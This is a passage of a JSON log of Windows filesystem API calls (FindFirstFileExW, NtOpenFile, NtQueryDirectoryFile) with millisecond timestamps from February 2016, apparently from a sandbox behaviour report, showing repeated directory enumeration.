"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,178", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,188", "api": 